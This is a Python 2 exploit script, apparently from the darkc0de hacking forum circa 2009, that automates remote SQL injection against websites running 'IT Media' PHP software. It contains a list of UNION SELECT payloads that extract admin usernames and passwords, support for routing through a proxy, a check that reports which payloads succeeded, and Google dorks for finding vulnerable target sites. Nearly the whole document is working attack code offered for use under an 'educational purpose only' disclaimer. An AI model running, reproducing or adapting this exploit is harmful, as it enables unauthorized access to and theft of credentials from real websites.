Remote SQL injection exploit for IT Media.
d982e49874f6ff8dd43e152eb2bca389923d45cf6c7e861479007cb60d9808d6
#!/usr/bin/python
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# !!! Special thanx for d3hydr8 and rsauron who inspired me !!!
#
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --- d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu #
# --- QKrun1x - skillfaker - Croathack - Optyx - Nuclear #
# --- Eliminator and to all members of darkc0de and ljuska.org# #
################################################################
import sys, os, time, re, urllib2, httplib, socket
if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)
proxy = "None"
count = 0
if len(sys.argv) < 2 or len(sys.argv) > 4:
print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 01/2009 ITmedia |"
print "| Help: itmedia.py -h |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|---------------------------------------------------------------|\n"
sys.exit(1)
for arg in sys.argv:
if arg == '-h':
print "\n|-------------------------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 01/2009 ITmedia |"
print "| Usage: itmedia.py www.site.com |"
print "| Example: itmedia.py http://www.blagoleks.net |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|-------------------------------------------------------------------------------|\n"
sys.exit(1)
elif arg == '-p':
proxy = sys.argv[count+1]
count += 1
site = sys.argv[1]
if site[:4] != "http":
site = "http://"+site
if site[-1] != "/":
site = site+"/"
vulnsql = ["vijest.php?id=-1+union+all+select+1,concat_ws(char(58),user,pass,0x62616c74617a6172),3,4,5,6,7+from+admin--","vijesti.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass,0x62616c74617a6172)+from+admin--","vijest.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass,0x62616c74617a6172),4,5,6,7,8,9,10+from+admin--","galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass,0x62616c74617a6172)+from+admin--","galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass,0x62616c74617a6172),4,5+from+admin--","ponuda.php?op=slika&ids=-1+union+all+select+1,concat_ws(char(58),user,pass,0x62616c74617a6172),3+from+admin--","ponuda.php?op=kategorija&id=-1+union+all+select+1,2,concat_ws(char(58),user,pass,0x62616c74617a6172),4+from+admin--","slike.php?op=slika&ids=-1+union+all+select+1,2,concat_ws(char(58),user,pass,0x62616c74617a6172),4,5+from+admin--"]
print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 01/2009 ITmedia |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|---------------------------------------------------------------|\n"
print "\n[-] %s" % time.strftime("%X")
socket.setdefaulttimeout(20)
try:
if proxy != "None":
print "[+] Proxy:",proxy
print "\n[+] Testing Proxy..."
pr = httplib.HTTPConnection(proxy)
pr.connect()
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
proxyfier = urllib2.build_opener(proxy_handler)
proxyfier.open("http://www.google.com")
print
print "\t[!] w00t!,w00t! Proxy: "+proxy+" Working"
print
else:
print "[-] Proxy not given"
print
proxy_handler = ""
except(socket.timeout):
print
print "\t[-] Proxy Timed Out"
print
sys.exit(1)
except(),msg:
print msg
print "\t[-] Proxy Failed"
print
sys.exit(1)
try:
url = "http://antionline.com/tools-and-toys/ip-locate/index.php?address="
except(IndexError):
print "[-] Wtf?"
proxyfier = urllib2.build_opener(proxy_handler)
proxy_check = proxyfier.open(url).readlines()
for line in proxy_check:
if re.search("<br><br>", line):
line = line.replace("</b>","").replace('<br>',"").replace('<b>',"")
print "\n[!]",line,"\n"
print "[+] Target:",site
print "[+]",len(vulnsql),"Vulns loaded..."
print "[+] Starting Scan..\n"
for sql in vulnsql:
print "[+] Checking:",site+sql.replace("\n","")
print
try:
source = proxyfier.open(site+sql.replace("\n", "")).read()
search = re.findall("baltazar",source)
if len(search) > 0:
print "[!] w00t!w00t" ,site+sql.replace("\n", "")
print
except(KeyboardInterrupt, SystemExit):
raise
except:
pass
print
print
print
print """\tDork : inurl:/galerija.php?op=slika
inurl:/ponuda.php?op=slika
inurl:/vijest.php?id= intext:itmedia
inurl:/slike.php?op=slika
"""
print
print "Check for more details: http://packetstormsecurity.org/0808-exploits/itmedia-sql.txt"
print "\n[-] %s" % time.strftime("%X")